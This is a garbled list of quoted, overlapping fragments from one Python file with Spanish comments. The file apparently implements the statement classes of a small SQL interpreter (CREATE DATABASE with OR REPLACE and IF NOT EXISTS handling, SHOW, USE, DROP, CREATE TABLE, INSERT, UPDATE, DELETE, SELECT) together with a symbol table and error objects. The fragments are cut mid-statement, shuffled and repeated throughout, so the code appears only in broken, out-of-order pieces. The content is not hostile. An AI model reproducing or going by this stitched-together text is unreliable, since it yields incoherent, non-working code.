__init__(self, id, cond): self.id", "a la lista return None # y retorno None class ShowDB(): def __init__(self):", "lo contrario no se hace nada class UseDB(): def __init__(self, id): # string", "agrega el error a la lista else: # si no existe ts_global.agregar_simbolo(nueva_base) #", "ifnot # si existe, no la crea self.id = id # nombre de", "in bases: # verifico si existe: if base.id == self.id: # si sí", "if not self.ifnot: # si no viene \"IF NOT EXISTS\", se crea/reemplaza if", "i in x: c = i.split(\":\") print('El nombre es -> ' + c[0]", "def __init__(self, id, cond): self.id = id self.cond = cond def execute(self): print('Ejecutando", "la base de datos ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo, de lo", "str(self.ref)) class CreateDB(): def __init__(self, replace, ifnot, id, owner, mode): # boolean, boolean,", "de datos def execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas las bases", "joins self.order = order self.conditions = conditions def execute(): #Llamar metodo que realizara", "as TS import Errores as E base_actual = None class Instruccion(): def __init__(self,", "ref def execute(self): print('ejecutando alter table') print('id : ' + str(self.id)) print('cols :", "db, None, None, None, None) x = columnas.split(\",\") for i in x: c", "del creador self.mode = mode # modo de almacenamiento def execute(self, ts_global): nueva_base", "__init__(self, replace, ifnot, id, owner, mode): # boolean, boolean, string, string, integer self.replace", "el nuevo símbolo, de lo contrario no se hace nada class UseDB(): def", "self.ref = ref def execute(self): print('ejecutando alter table') print('id : ' + str(self.id))", "if base.id == self.id: # si sí existe, retorno el id return self.id", "class Drop(): def __init__(self, id): self.id = id def execute(self): print('Ejecutando Drop') print('id", "la lista de bases de datos if base.id == self.id: # y verifico", "para comprobar si existe bases = ts_global.get_databases() # obtiene todas las bases de", "#se agrega el error a la lista else: # si no viene \"OR", ": ' + str(self.constrain)) print('foreing keys :' + str(self.fkey)) print('references : ' +", "Instruccion(): def __init__(self, tipo, instruccion): self.tipo = tipo self.instruccion = instruccion class Select():", "== self.id: # y verifico si existe existe = True # si existe,", "selcol self.fromcol = fromcol self.joins = joins self.order = order self.conditions = conditions", "lista de errores ls_error = [] def create_table(db, nombre, columnas, ts): nueva_tabla =", "print('El nombre es -> ' + c[0] + ' y el tipo es", "' + self.id) class CreateTable(): def __init__(self, id, base, cols, inh): self.id =", "TS.tipo_simbolo.TABLE, None, db, None, None, None, None) x = columnas.split(\",\") for i in", "constrain self.fkey = fkey self.ref = ref def execute(self): print('ejecutando alter table') print('id", "def execute(self): print('Ejecutando Update') print('id : ' + str(id)) ''' import tabla_simbolos as", "# obtiene todas las bases de datos for base in bases: # verifico", "id, cols, constrain, fkey, ref): self.id = id self.cols = cols self.constrain =", "print('foreing keys :' + str(self.fkey)) print('references : ' + str(self.ref)) class CreateDB(): def", "viene \"IF NOT EXISTS\", se crea/reemplaza if self.replace: # si viene \"OR REPLACE\"", "no la crea self.id = id # nombre de la base de datos", "de lo contrario no se hace nada class UseDB(): def __init__(self, id): #", "de bases de datos if base.id == self.id: # y verifico si existe", "e \\'IF NOT EXISTS\\'.') #ls_error.append(nuevo_error) #se agrega el error a la lista else:", "def __init__(self, id, base, cols, inh): self.id = id, self.base = base self.cols", "+ str(self.cols)) print('constrain : ' + str(self.constrain)) print('foreing keys :' + str(self.fkey)) print('references", "existe: # si existe, es un error nuevo_error = E.Errores('Semántico.', 'Ya existe una", "+ str(self.id)) for col in self.cols : print('col id : ' + str(col.id))", "' + c[0] + ' y el tipo es -> ' + c[1])", "se retorna un mensaje respuesta = '\\n' # de lo contrario, for base", "existe.') #ls_error.append(new_error) #se agrega el error a la lista return None # y", "de la tabla de simbolos ts_global = TS.tabla_simbolos() #Creación de lista de errores", "nombre es -> ' + c[0] + ' y el tipo es ->", "bases de datos return '\\n\\tNo hay bases de datos creadas.\\n' # se retorna", "ts): nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db, None, None, None, None) x =", "'\\n' # se concatenan los nombres return respuesta + '\\n' # y los", "de datos ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo, de lo contrario no", "base, cols, inh): self.id = id, self.base = base self.cols = cols self.inh", "+ self.inh) class Insert(): def __init__(self, id, vals): print('init') self.id = id self.vals", "id, cond): self.id = id self.cond = cond def execute(self): print('Ejecutando Delete') print('id", "+ '\\t' + base.id + '\\n' # se concatenan los nombres return respuesta", "Errores as E base_actual = None class Instruccion(): def __init__(self, tipo, instruccion): self.tipo", "class CreateTable(): def __init__(self, id, base, cols, inh): self.id = id, self.base =", "ts_global.get_databases() # obtiene todas las bases de datos if len(bases) == 0: #", "boolean, boolean, string, string, integer self.replace = replace # si existe, la reemplaza/modifica", "existe: # si existe la base de datos ts_global.drop_db(self.id) # se elimina, luego", "agrega el error a la lista else: # si no viene \"OR REPLACE\"", "print('references : ' + str(self.ref)) class CreateDB(): def __init__(self, replace, ifnot, id, owner,", "= TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None, None, None, None) existe = False #", "= id self.cond = cond def execute(self): print('Ejecutando Delete') print('id : ' +", "es -> ' + c[0] + ' y el tipo es -> '", "nombre/id del creador self.mode = mode # modo de almacenamiento def execute(self, ts_global):", "comprobación if not self.ifnot: # si no viene \"IF NOT EXISTS\", se crea/reemplaza", "print('value : ' + str(val)) class Delete(): def __init__(self, id, cond): self.id =", "= ts_global.get_databases() # obtiene todas las bases de datos if len(bases) == 0:", "ts.agregar_simbolo(nueva_tabla) return ts def create_column(db, tabla, columna, tipo, ts): nueva_columna = TS.Simbolo(columna,TS.tipo_simbolo.INTEGER,None,db,0,True,False,None) agregar", "base de datos self.owner = owner # nombre/id del creador self.mode = mode", "#se agrega el error a la lista else: # si no existe ts_global.agregar_simbolo(nueva_base)", "nuevo símbolo else: # si sí viene \"IF NOT EXISTS\" if self.replace: #", "el select print('ejecutando select') class AlterTable(): def __init__(self, id, cols, constrain, fkey, ref):", "ts_global.get_databases() # obtiene todas las bases de datos for base in bases: #", "+ str(col.tipo)) if self.inh != None : print('Inherit : ' + self.inh) class", "existe = True # si existe, cambio el valor de la bandera break", "existe = False # bandera para comprobar si existe bases = ts_global.get_databases() #", "tabla de simbolos ts_global = TS.tabla_simbolos() #Creación de lista de errores ls_error =", "str(self.id)) print('cols : ' + str(self.cols)) print('constrain : ' + str(self.constrain)) print('foreing keys", "\\'' + self.id + '\\'.') #ls_error.append(nuevo_error) #se agrega el error a la lista", "# boolean, boolean, string, string, integer self.replace = replace # si existe, la", "el error a la lista else: # si no viene \"OR REPLACE\" if", "+ ' y el tipo es -> ' + c[1]) #create_column(db, nombre, c[0],", "\"OR REPLACE\" if existe: # si existe, es un error nuevo_error = E.Errores('Semántico.',", "'\\'.') #ls_error.append(nuevo_error) #se agrega el error a la lista else: # si no", "c[1], ts) ts.agregar_simbolo(nueva_tabla) return ts def create_column(db, tabla, columna, tipo, ts): nueva_columna =", "lista, respuesta = respuesta + '\\t' + base.id + '\\n' # se concatenan", "str(self.id)) class Update(): def __init__(self, id, vals): self.id = id self.vals = vals", "+ c[0] + ' y el tipo es -> ' + c[1]) #create_column(db,", "def execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas las bases de datos", "# nombre de la base de datos self.owner = owner # nombre/id del", "obtiene todas las bases de datos for base in bases: # recorro la", "' + str(self.constrain)) print('foreing keys :' + str(self.fkey)) print('references : ' + str(self.ref))", "self.inh != None : print('Inherit : ' + self.inh) class Insert(): def __init__(self,", "__init__(self): print('show') def execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas las bases", "creadas.\\n' # se retorna un mensaje respuesta = '\\n' # de lo contrario,", "print('id : ' + str(self.id)) for col in self.cols : print('col id :", "viene \"OR REPLACE\" if existe: # si existe, es un error nuevo_error =", "execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas las bases de datos for", "nombres return respuesta + '\\n' # y los retorna class Drop(): def __init__(self,", "' + str(self.id)) print('cols : ' + str(self.cols)) print('constrain : ' + str(self.constrain))", "error a la lista else: # si no viene \"OR REPLACE\" if not", "vals def execute(self): print('Ejecutando Insert') print('id : ' + str(self.id)) for val in", "def execute(self): print('ejecutando alter table') print('id : ' + str(self.id)) print('cols : '", "# string self.id = id # nombre de la base de datos def", "# si sí viene \"IF NOT EXISTS\" if self.replace: # si viene \"OR", "de datos con el nombre \\'' + self.id + '\\'.') #ls_error.append(nuevo_error) #se agrega", "self.ifnot: # si no viene \"IF NOT EXISTS\", se crea/reemplaza if self.replace: #", "# se agrega el nuevo símbolo, de lo contrario no se hace nada", "boolean, string, string, integer self.replace = replace # si existe, la reemplaza/modifica self.ifnot", "de la base de datos self.owner = owner # nombre/id del creador self.mode", "'\\t' + base.id + '\\n' # se concatenan los nombres return respuesta +", "+ self.id) class CreateTable(): def __init__(self, id, base, cols, inh): self.id = id,", "Errores as E #Creación de la tabla de simbolos ts_global = TS.tabla_simbolos() #Creación", "# se agrega el nuevo símbolo else: # si no viene \"OR REPLACE\"", "== 0: # si no hay bases de datos return '\\n\\tNo hay bases", "base self.cols = cols self.inh = inh def execute(self,ts): print('Ejecutando Creare Table') print('id", "self.fkey = fkey self.ref = ref def execute(self): print('ejecutando alter table') print('id :", "execute(self): print('Ejecutando Insert') print('id : ' + str(self.id)) for val in self.vals: print('value", "existe: if base.id == self.id: # si sí existe, retorno el id return", "'\\' no existe.') #ls_error.append(new_error) #se agrega el error a la lista return None", "REPLACE\" if not existe: # si no existe la base de datos ts_global.agregar_simbolo(nueva_base)", "None, None, None, None) existe = False # bandera para comprobar si existe", "las bases de datos for base in bases: # verifico si existe: if", "los retorna class Drop(): def __init__(self, id): self.id = id def execute(self): print('Ejecutando", "execute(self): print('ejecutando alter table') print('id : ' + str(self.id)) print('cols : ' +", "for base in bases: # recorre la lista, respuesta = respuesta + '\\t'", "select') class AlterTable(): def __init__(self, id, cols, constrain, fkey, ref): self.id = id", "== self.id: # si sí existe, retorno el id return self.id # si", "self.cond = cond def execute(self): print('Ejecutando Delete') print('id : ' + str(self.id)) class", "Delete') print('id : ' + str(self.id)) class Update(): def __init__(self, id, vals): self.id", "''' import tabla_simbolos as TS import Errores as E #Creación de la tabla", "fkey, ref): self.id = id self.cols = cols self.constrain = constrain self.fkey =", "TS.tabla_simbolos() #Creación de lista de errores ls_error = [] def create_table(db, nombre, columnas,", "self.constrain = constrain self.fkey = fkey self.ref = ref def execute(self): print('ejecutando alter", "for base in bases: # verifico si existe: if base.id == self.id: #", "bases: # verifico si existe: if base.id == self.id: # si sí existe,", "= TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db, None, None, None, None) x = columnas.split(\",\") for", "string self.id = id # nombre de la base de datos def execute(self,", "= vals def execute(self): print('Ejecutando Update') print('id : ' + str(id)) ''' import", "None, None, None) existe = False # bandera para comprobar si existe bases", "# y verifico si existe existe = True # si existe, cambio el", "self.fromcol = fromcol self.joins = joins self.order = order self.conditions = conditions def", "los nombres return respuesta + '\\n' # y los retorna class Drop(): def", "viene \"OR REPLACE\" if existe: # si existe la base de datos ts_global.drop_db(self.id)", "+ str(self.fkey)) print('references : ' + str(self.ref)) class CreateDB(): def __init__(self, replace, ifnot,", "= mode # modo de almacenamiento def execute(self, ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE,", "retorna class Drop(): def __init__(self, id): self.id = id def execute(self): print('Ejecutando Drop')", "#Creación de lista de errores ls_error = [] def create_table(db, nombre, columnas, ts):", "tabla_simbolos as TS import Errores as E base_actual = None class Instruccion(): def", "si existe, cambio el valor de la bandera break # y salgo de", "print('constrain : ' + str(self.constrain)) print('foreing keys :' + str(self.fkey)) print('references : '", "existe la base de datos ts_global.drop_db(self.id) # se elimina, luego ts_global.agregar_simbolo(nueva_base) # se", "un mensaje respuesta = '\\n' # de lo contrario, for base in bases:", "# y salgo de la comprobación if not self.ifnot: # si no viene", "cols, constrain, fkey, ref): self.id = id self.cols = cols self.constrain = constrain", "-> ' + c[0] + ' y el tipo es -> ' +", "Insert(): def __init__(self, id, vals): print('init') self.id = id self.vals = vals def", "datos creadas.\\n' # se retorna un mensaje respuesta = '\\n' # de lo", "respuesta = respuesta + '\\t' + base.id + '\\n' # se concatenan los", "concatenan los nombres return respuesta + '\\n' # y los retorna class Drop():", "si no viene \"IF NOT EXISTS\", se crea/reemplaza if self.replace: # si viene", "datos \\'' + self.id + '\\' no existe.') #ls_error.append(new_error) #se agrega el error", "de almacenamiento def execute(self, ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None, None,", "es error nuevo_error = E.Errores('Semántico.', 'No pueden venir conjuntamente las cláusulas \\'OR REPLACE\\'", ": print('col id : ' + str(col.id)) print('col type : ' + str(col.tipo))", "__init__(self, id, vals): print('init') self.id = id self.vals = vals def execute(self): print('Ejecutando", ": ' + str(self.ref)) class CreateDB(): def __init__(self, replace, ifnot, id, owner, mode):", "NOT EXISTS\\'.') #ls_error.append(nuevo_error) #se agrega el error a la lista else: # si", "simbolos ts_global = TS.tabla_simbolos() #Creación de lista de errores ls_error = [] def", "# verifico si existe: if base.id == self.id: # si sí existe, retorno", "' + str(self.cols)) print('constrain : ' + str(self.constrain)) print('foreing keys :' + str(self.fkey))", "\"OR REPLACE\", es error nuevo_error = E.Errores('Semántico.', 'No pueden venir conjuntamente las cláusulas", "NOT EXISTS\" if self.replace: # si viene \"OR REPLACE\", es error nuevo_error =", "type : ' + str(col.tipo)) if self.inh != None : print('Inherit : '", "recorro la lista de bases de datos if base.id == self.id: # y", "None, None, None, None, None, None) existe = False # bandera para comprobar", "agrega el nuevo símbolo else: # si no viene \"OR REPLACE\" if existe:", "# si sí existe, retorno el id return self.id # si no, es", "ifnot, id, owner, mode): # boolean, boolean, string, string, integer self.replace = replace", "'La base de datos \\'' + self.id + '\\' no existe.') #ls_error.append(new_error) #se", "def create_table(db, nombre, columnas, ts): nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db, None, None,", "es -> ' + c[1]) #create_column(db, nombre, c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla) return ts", "es error new_error = E.Errores('Semántico.', 'La base de datos \\'' + self.id +", "Drop(): def __init__(self, id): self.id = id def execute(self): print('Ejecutando Drop') print('id :", "y verifico si existe existe = True # si existe, cambio el valor", "' + str(id)) ''' import tabla_simbolos as TS import Errores as E #Creación", "self.id: # y verifico si existe existe = True # si existe, cambio", "las bases de datos for base in bases: # recorro la lista de", "None) x = columnas.split(\",\") for i in x: c = i.split(\":\") print('El nombre", "datos for base in bases: # recorro la lista de bases de datos", "execute(self,ts): print('Ejecutando Creare Table') print('id : ' + str(self.id)) for col in self.cols", "False # bandera para comprobar si existe bases = ts_global.get_databases() # obtiene todas", "break # y salgo de la comprobación if not self.ifnot: # si no", "#ls_error.append(nuevo_error) #se agrega el error a la lista else: # si no viene", "order self.conditions = conditions def execute(): #Llamar metodo que realizara el select print('ejecutando", "# si no hay bases de datos return '\\n\\tNo hay bases de datos", "base de datos \\'' + self.id + '\\' no existe.') #ls_error.append(new_error) #se agrega", "base.id + '\\n' # se concatenan los nombres return respuesta + '\\n' #", "ts_global = TS.tabla_simbolos() #Creación de lista de errores ls_error = [] def create_table(db,", "ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: # si sí viene \"IF", "de la base de datos def execute(self, ts_global): bases = ts_global.get_databases() # obtiene", "símbolo else: # si sí viene \"IF NOT EXISTS\" if self.replace: # si", "no existe la base de datos ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo,", "el nombre \\'' + self.id + '\\'.') #ls_error.append(nuevo_error) #se agrega el error a", "error a la lista else: # si no existe ts_global.agregar_simbolo(nueva_base) # se agrega", "obtiene todas las bases de datos for base in bases: # verifico si", "None) existe = False # bandera para comprobar si existe bases = ts_global.get_databases()", "retorno None class ShowDB(): def __init__(self): print('show') def execute(self, ts_global): bases = ts_global.get_databases()", "in self.vals: print('value : ' + str(val)) class Delete(): def __init__(self, id, cond):", "+ str(id)) ''' import tabla_simbolos as TS import Errores as E #Creación de", "id, owner, mode): # boolean, boolean, string, string, integer self.replace = replace #", "la base de datos ts_global.drop_db(self.id) # se elimina, luego ts_global.agregar_simbolo(nueva_base) # se agrega", "verifico si existe: if base.id == self.id: # si sí existe, retorno el", "class Insert(): def __init__(self, id, vals): print('init') self.id = id self.vals = vals", "E.Errores('Semántico.', 'Ya existe una base de datos con el nombre \\'' + self.id", "alter table') print('id : ' + str(self.id)) print('cols : ' + str(self.cols)) print('constrain", "vals def execute(self): print('Ejecutando Update') print('id : ' + str(id)) ''' import tabla_simbolos", "si no existe ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: # si", "de errores ls_error = [] def create_table(db, nombre, columnas, ts): nueva_tabla = TS.Simbolo(nombre,", "in self.cols : print('col id : ' + str(col.id)) print('col type : '", "'Ya existe una base de datos con el nombre \\'' + self.id +", "cond def execute(self): print('Ejecutando Delete') print('id : ' + str(self.id)) class Update(): def", "self.replace: # si viene \"OR REPLACE\" if existe: # si existe la base", "no se hace nada class UseDB(): def __init__(self, id): # string self.id =", "de lo contrario, for base in bases: # recorre la lista, respuesta =", "EXISTS\", se crea/reemplaza if self.replace: # si viene \"OR REPLACE\" if existe: #", "base de datos ts_global.drop_db(self.id) # se elimina, luego ts_global.agregar_simbolo(nueva_base) # se agrega el", "vals): print('init') self.id = id self.vals = vals def execute(self): print('Ejecutando Insert') print('id", "self.cols = cols self.inh = inh def execute(self,ts): print('Ejecutando Creare Table') print('id :", "error new_error = E.Errores('Semántico.', 'La base de datos \\'' + self.id + '\\'", "execute(self): print('Ejecutando Delete') print('id : ' + str(self.id)) class Update(): def __init__(self, id,", "CreateDB(): def __init__(self, replace, ifnot, id, owner, mode): # boolean, boolean, string, string,", "def __init__(self, dist, selcol, fromcol, joins, order, conditions): self.dist = dist self.selcol =", "return None # y retorno None class ShowDB(): def __init__(self): print('show') def execute(self,", "# si existe, no la crea self.id = id # nombre de la", "id return self.id # si no, es error new_error = E.Errores('Semántico.', 'La base", "= vals def execute(self): print('Ejecutando Insert') print('id : ' + str(self.id)) for val", "__init__(self, id): # string self.id = id # nombre de la base de", "= selcol self.fromcol = fromcol self.joins = joins self.order = order self.conditions =", "venir conjuntamente las cláusulas \\'OR REPLACE\\' e \\'IF NOT EXISTS\\'.') #ls_error.append(nuevo_error) #se agrega", "execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas las bases de datos if", "select print('ejecutando select') class AlterTable(): def __init__(self, id, cols, constrain, fkey, ref): self.id", "tabla_simbolos as TS import Errores as E #Creación de la tabla de simbolos", "__init__(self, id, cols, constrain, fkey, ref): self.id = id self.cols = cols self.constrain", "self.vals = vals def execute(self): print('Ejecutando Update') print('id : ' + str(id)) '''", "a la lista else: # si no viene \"OR REPLACE\" if not existe:", "'\\n' # de lo contrario, for base in bases: # recorre la lista,", "as TS import Errores as E #Creación de la tabla de simbolos ts_global", "return '\\n\\tNo hay bases de datos creadas.\\n' # se retorna un mensaje respuesta", "None # y retorno None class ShowDB(): def __init__(self): print('show') def execute(self, ts_global):", "self.inh = inh def execute(self,ts): print('Ejecutando Creare Table') print('id : ' + str(self.id))", "+ c[1]) #create_column(db, nombre, c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla) return ts def create_column(db, tabla,", "#Llamar metodo que realizara el select print('ejecutando select') class AlterTable(): def __init__(self, id,", "base.id == self.id: # y verifico si existe existe = True # si", "# se agrega el nuevo símbolo else: # si sí viene \"IF NOT", "' + str(col.tipo)) if self.inh != None : print('Inherit : ' + self.inh)", "nombre, columnas, ts): nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db, None, None, None, None)", "hace nada class UseDB(): def __init__(self, id): # string self.id = id #", "print('Ejecutando Update') print('id : ' + str(id)) ''' import tabla_simbolos as TS import", "con el nombre \\'' + self.id + '\\'.') #ls_error.append(nuevo_error) #se agrega el error", "if not existe: # si no existe la base de datos ts_global.agregar_simbolo(nueva_base) #", "agrega el nuevo símbolo, de lo contrario no se hace nada class UseDB():", "lista else: # si no existe ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo", "# obtiene todas las bases de datos for base in bases: # recorro", "modo de almacenamiento def execute(self, ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None,", "!= None : print('Inherit : ' + self.inh) class Insert(): def __init__(self, id,", "' + str(self.id)) class Update(): def __init__(self, id, vals): self.id = id self.vals", "todas las bases de datos for base in bases: # recorro la lista", "None, None, None, None, None) existe = False # bandera para comprobar si", "de datos creadas.\\n' # se retorna un mensaje respuesta = '\\n' # de", "datos if base.id == self.id: # y verifico si existe existe = True", "existe ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: # si sí viene", "fromcol, joins, order, conditions): self.dist = dist self.selcol = selcol self.fromcol = fromcol", "si no viene \"OR REPLACE\" if not existe: # si no existe la", "self.id = id, self.base = base self.cols = cols self.inh = inh def", ": ' + str(col.id)) print('col type : ' + str(col.tipo)) if self.inh !=", "de datos self.owner = owner # nombre/id del creador self.mode = mode #", "= id # nombre de la base de datos def execute(self, ts_global): bases", "= E.Errores('Semántico.', 'No pueden venir conjuntamente las cláusulas \\'OR REPLACE\\' e \\'IF NOT", "self.cols : print('col id : ' + str(col.id)) print('col type : ' +", "#ls_error.append(nuevo_error) #se agrega el error a la lista else: # si no existe", "id self.cols = cols self.constrain = constrain self.fkey = fkey self.ref = ref", "si existe la base de datos ts_global.drop_db(self.id) # se elimina, luego ts_global.agregar_simbolo(nueva_base) #", "si sí existe, retorno el id return self.id # si no, es error", "print('id : ' + str(self.id)) print('cols : ' + str(self.cols)) print('constrain : '", "viene \"OR REPLACE\" if not existe: # si no existe la base de", "no viene \"IF NOT EXISTS\", se crea/reemplaza if self.replace: # si viene \"OR", "EXISTS\" if self.replace: # si viene \"OR REPLACE\", es error nuevo_error = E.Errores('Semántico.',", "reemplaza/modifica self.ifnot = ifnot # si existe, no la crea self.id = id", "__init__(self, dist, selcol, fromcol, joins, order, conditions): self.dist = dist self.selcol = selcol", "es un error nuevo_error = E.Errores('Semántico.', 'Ya existe una base de datos con", "bandera para comprobar si existe bases = ts_global.get_databases() # obtiene todas las bases", "existe, cambio el valor de la bandera break # y salgo de la", "# si viene \"OR REPLACE\" if existe: # si existe la base de", "class Instruccion(): def __init__(self, tipo, instruccion): self.tipo = tipo self.instruccion = instruccion class", "de lista de errores ls_error = [] def create_table(db, nombre, columnas, ts): nueva_tabla", "AlterTable(): def __init__(self, id, cols, constrain, fkey, ref): self.id = id self.cols =", "datos self.owner = owner # nombre/id del creador self.mode = mode # modo", "# si no viene \"IF NOT EXISTS\", se crea/reemplaza if self.replace: # si", "y retorno None class ShowDB(): def __init__(self): print('show') def execute(self, ts_global): bases =", "def execute(): #Llamar metodo que realizara el select print('ejecutando select') class AlterTable(): def", "no existe.') #ls_error.append(new_error) #se agrega el error a la lista return None #", "viene \"IF NOT EXISTS\" if self.replace: # si viene \"OR REPLACE\", es error", "de la bandera break # y salgo de la comprobación if not self.ifnot:", "x = columnas.split(\",\") for i in x: c = i.split(\":\") print('El nombre es", "# si existe, cambio el valor de la bandera break # y salgo", ": ' + str(self.id)) for col in self.cols : print('col id : '", "TS import Errores as E #Creación de la tabla de simbolos ts_global =", "el tipo es -> ' + c[1]) #create_column(db, nombre, c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla)", "print('ejecutando select') class AlterTable(): def __init__(self, id, cols, constrain, fkey, ref): self.id =", "mode): # boolean, boolean, string, string, integer self.replace = replace # si existe,", "no, es error new_error = E.Errores('Semántico.', 'La base de datos \\'' + self.id", "nombre \\'' + self.id + '\\'.') #ls_error.append(nuevo_error) #se agrega el error a la", "realizara el select print('ejecutando select') class AlterTable(): def __init__(self, id, cols, constrain, fkey,", "la bandera break # y salgo de la comprobación if not self.ifnot: #", "class Delete(): def __init__(self, id, cond): self.id = id self.cond = cond def", "# modo de almacenamiento def execute(self, ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None,", "E base_actual = None class Instruccion(): def __init__(self, tipo, instruccion): self.tipo = tipo", "self.joins = joins self.order = order self.conditions = conditions def execute(): #Llamar metodo", "la comprobación if not self.ifnot: # si no viene \"IF NOT EXISTS\", se", "len(bases) == 0: # si no hay bases de datos return '\\n\\tNo hay", "' y el tipo es -> ' + c[1]) #create_column(db, nombre, c[0], c[1],", "bases de datos creadas.\\n' # se retorna un mensaje respuesta = '\\n' #", "= ifnot # si existe, no la crea self.id = id # nombre", "no viene \"OR REPLACE\" if existe: # si existe, es un error nuevo_error", "nuevo símbolo, de lo contrario no se hace nada class UseDB(): def __init__(self,", "self.replace: # si viene \"OR REPLACE\", es error nuevo_error = E.Errores('Semántico.', 'No pueden", "return respuesta + '\\n' # y los retorna class Drop(): def __init__(self, id):", "si no existe la base de datos ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo", "import Errores as E #Creación de la tabla de simbolos ts_global = TS.tabla_simbolos()", "id def execute(self): print('Ejecutando Drop') print('id : ' + self.id) class CreateTable(): def", "create_column(db, tabla, columna, tipo, ts): nueva_columna = TS.Simbolo(columna,TS.tipo_simbolo.INTEGER,None,db,0,True,False,None) agregar = ts.agregar_columna(tabla, db, nueva_columna)", "execute(): #Llamar metodo que realizara el select print('ejecutando select') class AlterTable(): def __init__(self,", "= E.Errores('Semántico.', 'La base de datos \\'' + self.id + '\\' no existe.')", "pueden venir conjuntamente las cláusulas \\'OR REPLACE\\' e \\'IF NOT EXISTS\\'.') #ls_error.append(nuevo_error) #se", "recorre la lista, respuesta = respuesta + '\\t' + base.id + '\\n' #", "datos def execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas las bases de", "Select(): def __init__(self, dist, selcol, fromcol, joins, order, conditions): self.dist = dist self.selcol", "self.id = id # nombre de la base de datos self.owner = owner", "= '\\n' # de lo contrario, for base in bases: # recorre la", "sí viene \"IF NOT EXISTS\" if self.replace: # si viene \"OR REPLACE\", es", "base in bases: # recorre la lista, respuesta = respuesta + '\\t' +", "execute(self, ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None, None, None, None) existe", "# si no existe la base de datos ts_global.agregar_simbolo(nueva_base) # se agrega el", "self.id = id # nombre de la base de datos def execute(self, ts_global):", "creador self.mode = mode # modo de almacenamiento def execute(self, ts_global): nueva_base =", "id self.vals = vals def execute(self): print('Ejecutando Insert') print('id : ' + str(self.id))", "el id return self.id # si no, es error new_error = E.Errores('Semántico.', 'La", "bases de datos if base.id == self.id: # y verifico si existe existe", "tipo self.instruccion = instruccion class Select(): def __init__(self, dist, selcol, fromcol, joins, order,", "contrario, for base in bases: # recorre la lista, respuesta = respuesta +", "datos if len(bases) == 0: # si no hay bases de datos return", "la base de datos def execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas", "self.owner = owner # nombre/id del creador self.mode = mode # modo de", "respuesta + '\\n' # y los retorna class Drop(): def __init__(self, id): self.id", "def __init__(self, id): # string self.id = id # nombre de la base", "el valor de la bandera break # y salgo de la comprobación if", "print('ejecutando alter table') print('id : ' + str(self.id)) print('cols : ' + str(self.cols))", "ShowDB(): def __init__(self): print('show') def execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas", "todas las bases de datos for base in bases: # verifico si existe:", "= ts_global.get_databases() # obtiene todas las bases de datos for base in bases:", "inh): self.id = id, self.base = base self.cols = cols self.inh = inh", "CreateTable(): def __init__(self, id, base, cols, inh): self.id = id, self.base = base", "ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: # si no viene \"OR", "' + str(col.id)) print('col type : ' + str(col.tipo)) if self.inh != None", "cláusulas \\'OR REPLACE\\' e \\'IF NOT EXISTS\\'.') #ls_error.append(nuevo_error) #se agrega el error a", "mensaje respuesta = '\\n' # de lo contrario, for base in bases: #", "cond): self.id = id self.cond = cond def execute(self): print('Ejecutando Delete') print('id :", "self.replace = replace # si existe, la reemplaza/modifica self.ifnot = ifnot # si", "'\\n' # y los retorna class Drop(): def __init__(self, id): self.id = id", "str(self.id)) for col in self.cols : print('col id : ' + str(col.id)) print('col", "si existe, es un error nuevo_error = E.Errores('Semántico.', 'Ya existe una base de", "col in self.cols : print('col id : ' + str(col.id)) print('col type :", "def execute(self): print('Ejecutando Insert') print('id : ' + str(self.id)) for val in self.vals:", "print('Ejecutando Delete') print('id : ' + str(self.id)) class Update(): def __init__(self, id, vals):", "self.vals = vals def execute(self): print('Ejecutando Insert') print('id : ' + str(self.id)) for", "y salgo de la comprobación if not self.ifnot: # si no viene \"IF", "else: # si no existe ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else:", "id, self.base = base self.cols = cols self.inh = inh def execute(self,ts): print('Ejecutando", "id # nombre de la base de datos self.owner = owner # nombre/id", "bases = ts_global.get_databases() # obtiene todas las bases de datos if len(bases) ==", "print('id : ' + str(self.id)) for val in self.vals: print('value : ' +", "str(self.constrain)) print('foreing keys :' + str(self.fkey)) print('references : ' + str(self.ref)) class CreateDB():", "print('col type : ' + str(col.tipo)) if self.inh != None : print('Inherit :", "selcol, fromcol, joins, order, conditions): self.dist = dist self.selcol = selcol self.fromcol =", "nombre de la base de datos def execute(self, ts_global): bases = ts_global.get_databases() #", "existe una base de datos con el nombre \\'' + self.id + '\\'.')", "= id # nombre de la base de datos self.owner = owner #", "class UseDB(): def __init__(self, id): # string self.id = id # nombre de", "E.Errores('Semántico.', 'La base de datos \\'' + self.id + '\\' no existe.') #ls_error.append(new_error)", "str(col.tipo)) if self.inh != None : print('Inherit : ' + self.inh) class Insert():", "c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla) return ts def create_column(db, tabla, columna, tipo, ts): nueva_columna", "= 